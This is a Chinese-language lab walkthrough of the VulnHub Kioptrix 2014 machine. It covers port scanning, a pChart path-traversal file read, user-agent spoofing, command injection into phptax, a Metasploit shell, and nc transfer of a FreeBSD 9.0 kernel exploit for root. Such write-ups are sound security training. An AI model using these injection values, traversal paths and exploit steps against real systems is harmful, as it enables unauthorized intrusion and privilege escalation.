VulnHub - Kioptrix 2014
环境说明:
靶机:172.21.137.125
Kali:172.21.137.36
渗透过程:
-
开始信息收集,命令:
arp-scan -l
,找到ip为172.21.137.125(靶机开关前后各扫一次,看多的那个就是) -
用nmap命令
nmap -n -sV --open -p- -T4 172.21.137.125
,仅有80和8080端口开着,用的还是Apache 2.2.21服务的 -
两个端口都访问下,80端口是欢迎页面,8080端口限制了访问
-
继续用dirsearch工具
./dirsearch.py --random-agents -u 'http://172.21.137.125/' -e *
扫目录,没有发现任何有价值的东西 -
EMMM,陷入僵局,难道要看网页源码,不看不知道一看吓一跳,发现隐藏路径
-
访问后发现是pChart后台
-
大概点了下各个标签栏,且用dirsearch仅扫到一些没什么用的目录遍历,没有收获,查一下谷歌,发现pChart有文件包含漏洞,并有相应exp
-
根据exp来操作,确实存在本地文件包含漏洞
-
但是光有这个漏洞还是不好利用啊,能读的文件难道要一个个猜吗,只能从现有的信息来猜文件,头疼,试试看读apache文件,根据火狐浏览器插件Wappalyzer获取到,操作系统为FreeBSD,那么apache路径应该和Kali及Ubuntu里的有所出入
-
根据该网站,匹配下当前靶机的信息,获取到apache在FredBSD系统上的默认路径
-
二话不说,直接访问配置文件,路径
%2f..%2f..%2fusr/local/etc/apache22/httpd.conf
,发现一处刺眼的,关于8080端口的访问控制信息,网上查了下,知道了Allow from env=Mozilla4_browser
的意思是,只有Mozilla4的浏览器才可访问8080端口 -
那就好说了,立马装上可更改user agent的相关插件,更改userAgent为Mozilla4即可,改好记得一定要Apply应用
-
更改好浏览器userAgent,访问下8080,一下子可访问了,而且暴露了phptax目录
-
进入该phptax目录,发现是预览PDF的系统
-
尝试点一下view,发现该功能并没有用,点make似乎也只是刷新一下,尝试在链接中加引号引发sql报错也没有成效,看来需要换思路
-
用dirsearch工具的命令
./dirsearch.py --ua='Mozilla/4.0 (Windows NT 10.0; Win64; x64; rv:71.0)' -u 'http://172.21.137.125:8080/phptax/' -e *
扫下目录(这里也要加改过的userAgent参数,不然没法扫),发现其存在/data/pdf/目录,重要的是还有黑客才执行的命令 -
根据该目录和文件名猜测,很有可能是某个地方存在读文件功能的同时,还能执行命令!恰好phptax是读pdf文件的地方,岂不是一拍即合!?
-
看了下点make的链接,发现只有pfilez参数后的才有效,比如这样
pfilez=1040pg1.tob;aaaa&pdf=make
,回车后,再点下make按钮,就出现在了data/pdf/目录下了,看来地方是找对了! -
之后试了下NC,尝试执行nc命令或者bash的命令来反连Kali,都以失败告终,bash命令根本没用,nc可以反连成功,但是瞬间就断掉了,需要换个思路
-
实在想不到了,谷歌一下,发现phptax早有EXP可用,哎,亏我费那么大功夫
-
不过直接在链接中更改参数来反连,这个太低效了,而且不稳定,直接去msf用命令search phptax搜,果然有
-
use一下,再查看参数,需要靶机地址和端口
-
set RHOSTS 172.21.137.125
,再set RPORT 8080
,更改完毕后直接run,成功拿到SHELL -
但是whoami一下发现不是root用户,看来要提权,
uname -a
获取到靶机系统为FreeBSD 9.0
的,也查到有相应EXP可用,附上地址,但用不了wget命令,没法直接从kali那下载过来,而且使用了msf远程打EXP也不成功,充满绝望!!! -
实在不行,网上查资料发现可用nc来传输文件,现在kali上新建名为sys.c文件,并把EXP的代码内容复制进去
-
然后用nc命令开启端口,并把文件输入重定向。命令
nc -lvp 1234 < sys.c
-
靶机这里先进入/tmp目录下,然后用命令
nc -nv 172.21.137.36 1234 > sys.c
,连接靶机并把文件下载过来 -
直接命令
gcc sys.c
编译该文件(这里说明一下,该EXP的注释中没有提到如何使用,所以直接编译即可) -
编译完成后,会获得 a.out 的文件
-
废话不多说,直接
./a.out
运行,完成后whoami
一下,成功提权到root身份!!!结束!!!: )
PS:至于最后要不要改密码,看个人喜好,就不操作了。
参考链接:
- https://www.vulnhub.com/entry/kioptrix-2014-5,62/
- https://*.com/questions/12202021/lost-httpd-conf-file-located-apache
- https://cwiki.apache.org/confluence/display/HTTPD/DistrosDefaultLayout#DistrosDefaultLayout-FreeBSD6.1(Apachehttpd2.2):
- https://www.exploit-db.com/exploits/31173
- https://www.exploit-db.com/exploits/21665
- https://www.google.com/search?q=freebsd+9.0+privilege+escalation&ei=-yokXp2ZCYKJmAWu3bzQAw&start=10&sa=N&ved=2ahUKEwjdgtuGto_nAhWCBKYKHa4uDzoQ8tMDegQICxAv&biw=1920&bih=969
- https://www.exploit-db.com/exploits/28718
- https://jhalon.github.io/vulnhub-kioptrix5/